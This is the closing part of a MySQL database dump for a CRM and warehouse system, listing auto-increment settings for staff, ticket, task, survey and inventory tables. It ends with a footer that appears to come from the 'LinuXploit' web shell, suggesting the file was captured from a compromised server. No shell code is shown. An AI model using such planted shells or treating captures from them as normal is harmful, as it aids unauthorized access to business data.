  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblservices`
--
ALTER TABLE `tblservices`
  MODIFY `serviceid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblspam_filters`
--
ALTER TABLE `tblspam_filters`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblspreadsheet_online_hash_share`
--
ALTER TABLE `tblspreadsheet_online_hash_share`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblspreadsheet_online_my_folder`
--
ALTER TABLE `tblspreadsheet_online_my_folder`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=29;

--
-- AUTO_INCREMENT for table `tblspreadsheet_online_related`
--
ALTER TABLE `tblspreadsheet_online_related`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstaff`
--
ALTER TABLE `tblstaff`
  MODIFY `staffid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=19;

--
-- AUTO_INCREMENT for table `tblstaff_contract`
--
ALTER TABLE `tblstaff_contract`
  MODIFY `id_contract` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstaff_contracttype`
--
ALTER TABLE `tblstaff_contracttype`
  MODIFY `id_contracttype` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblstaff_contract_detail`
--
ALTER TABLE `tblstaff_contract_detail`
  MODIFY `contract_detail_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstaff_departments`
--
ALTER TABLE `tblstaff_departments`
  MODIFY `staffdepartmentid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=143;

--
-- AUTO_INCREMENT for table `tblstaff_insurance`
--
ALTER TABLE `tblstaff_insurance`
  MODIFY `insurance_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstaff_insurance_history`
--
ALTER TABLE `tblstaff_insurance_history`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstock_take`
--
ALTER TABLE `tblstock_take`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblstock_take_detail`
--
ALTER TABLE `tblstock_take_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsubscriptions`
--
ALTER TABLE `tblsubscriptions`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsurveyresultsets`
--
ALTER TABLE `tblsurveyresultsets`
  MODIFY `resultsetid` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblsurveys`
--
ALTER TABLE `tblsurveys`
  MODIFY `surveyid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblsurveysemailsendcron`
--
ALTER TABLE `tblsurveysemailsendcron`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12;

--
-- AUTO_INCREMENT for table `tblsurveysendlog`
--
ALTER TABLE `tblsurveysendlog`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tbltags`
--
ALTER TABLE `tbltags`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;

--
-- AUTO_INCREMENT for table `tbltasks`
--
ALTER TABLE `tbltasks`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=171;

--
-- AUTO_INCREMENT for table `tbltaskstimers`
--
ALTER TABLE `tbltaskstimers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `tbltasks_checklist_templates`
--
ALTER TABLE `tbltasks_checklist_templates`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tbltask_assigned`
--
ALTER TABLE `tbltask_assigned`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=439;

--
-- AUTO_INCREMENT for table `tbltask_checklist_items`
--
ALTER TABLE `tbltask_checklist_items`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=35;

--
-- AUTO_INCREMENT for table `tbltask_comments`
--
ALTER TABLE `tbltask_comments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=15;

--
-- AUTO_INCREMENT for table `tbltask_followers`
--
ALTER TABLE `tbltask_followers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=212;

--
-- AUTO_INCREMENT for table `tbltaxes`
--
ALTER TABLE `tbltaxes`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tbltemplates`
--
ALTER TABLE `tbltemplates`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tbltickets`
--
ALTER TABLE `tbltickets`
  MODIFY `ticketid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=88;

--
-- AUTO_INCREMENT for table `tbltickets_pipe_log`
--
ALTER TABLE `tbltickets_pipe_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbltickets_predefined_replies`
--
ALTER TABLE `tbltickets_predefined_replies`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tbltickets_priorities`
--
ALTER TABLE `tbltickets_priorities`
  MODIFY `priorityid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tbltickets_status`
--
ALTER TABLE `tbltickets_status`
  MODIFY `ticketstatusid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblticket_attachments`
--
ALTER TABLE `tblticket_attachments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=58;

--
-- AUTO_INCREMENT for table `tblticket_replies`
--
ALTER TABLE `tblticket_replies`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tbltodos`
--
ALTER TABLE `tbltodos`
  MODIFY `todoid` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tbltracked_mails`
--
ALTER TABLE `tbltracked_mails`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=60;

--
-- AUTO_INCREMENT for table `tbltwocheckout_log`
--
ALTER TABLE `tbltwocheckout_log`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tbluser_api`
--
ALTER TABLE `tbluser_api`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tbluser_meta`
--
ALTER TABLE `tbluser_meta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=214;

--
-- AUTO_INCREMENT for table `tblvault`
--
ALTER TABLE `tblvault`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblviews_tracking`
--
ALTER TABLE `tblviews_tracking`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=29;

--
-- AUTO_INCREMENT for table `tblwarehouse`
--
ALTER TABLE `tblwarehouse`
  MODIFY `warehouse_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblware_body_type`
--
ALTER TABLE `tblware_body_type`
  MODIFY `body_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblware_color`
--
ALTER TABLE `tblware_color`
  MODIFY `color_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=9;

--
-- AUTO_INCREMENT for table `tblware_commodity_type`
--
ALTER TABLE `tblware_commodity_type`
  MODIFY `commodity_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblware_size_type`
--
ALTER TABLE `tblware_size_type`
  MODIFY `size_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblware_style_type`
--
ALTER TABLE `tblware_style_type`
  MODIFY `style_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblware_unit_type`
--
ALTER TABLE `tblware_unit_type`
  MODIFY `unit_type_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblweb_to_lead`
--
ALTER TABLE `tblweb_to_lead`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblwh_activity_log`
--
ALTER TABLE `tblwh_activity_log`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=14;

--
-- AUTO_INCREMENT for table `tblwh_approval_details`
--
ALTER TABLE `tblwh_approval_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;

--
-- AUTO_INCREMENT for table `tblwh_approval_setting`
--
ALTER TABLE `tblwh_approval_setting`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;

--
-- AUTO_INCREMENT for table `tblwh_brand`
--
ALTER TABLE `tblwh_brand`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_custom_fields`
--
ALTER TABLE `tblwh_custom_fields`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblwh_goods_delivery_activity_log`
--
ALTER TABLE `tblwh_goods_delivery_activity_log`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;

--
-- AUTO_INCREMENT for table `tblwh_inventory_serial_numbers`
--
ALTER TABLE `tblwh_inventory_serial_numbers`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_loss_adjustment`
--
ALTER TABLE `tblwh_loss_adjustment`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_loss_adjustment_detail`
--
ALTER TABLE `tblwh_loss_adjustment_detail`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_model`
--
ALTER TABLE `tblwh_model`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_omni_shipments`
--
ALTER TABLE `tblwh_omni_shipments`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;

--
-- AUTO_INCREMENT for table `tblwh_order_returns`
--
ALTER TABLE `tblwh_order_returns`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_order_returns_refunds`
--
ALTER TABLE `tblwh_order_returns_refunds`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_order_return_details`
--
ALTER TABLE `tblwh_order_return_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_packing_lists`
--
ALTER TABLE `tblwh_packing_lists`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblwh_packing_list_details`
--
ALTER TABLE `tblwh_packing_list_details`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblwh_series`
--
ALTER TABLE `tblwh_series`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwh_sub_group`
--
ALTER TABLE `tblwh_sub_group`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwoocommere_store`
--
ALTER TABLE `tblwoocommere_store`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblwoocommere_store_detailt`
--
ALTER TABLE `tblwoocommere_store_detailt`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;

--
-- AUTO_INCREMENT for table `tblworkplace`
--
ALTER TABLE `tblworkplace`
  MODIFY `workplace_id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- AUTO_INCREMENT for table `tblwork_shift`
--
ALTER TABLE `tblwork_shift`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;

--
-- Constraints for dumped tables
--

--
-- Constraints for table `tbltwocheckout_log`
--
ALTER TABLE `tbltwocheckout_log`
  ADD CONSTRAINT `tbltwocheckout_log_ibfk_1` FOREIGN KEY (`invoice_id`) REFERENCES `tblinvoices` (`id`) ON DELETE CASCADE;
COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

Youez - 2016 - github.com/yon3zu
LinuXploit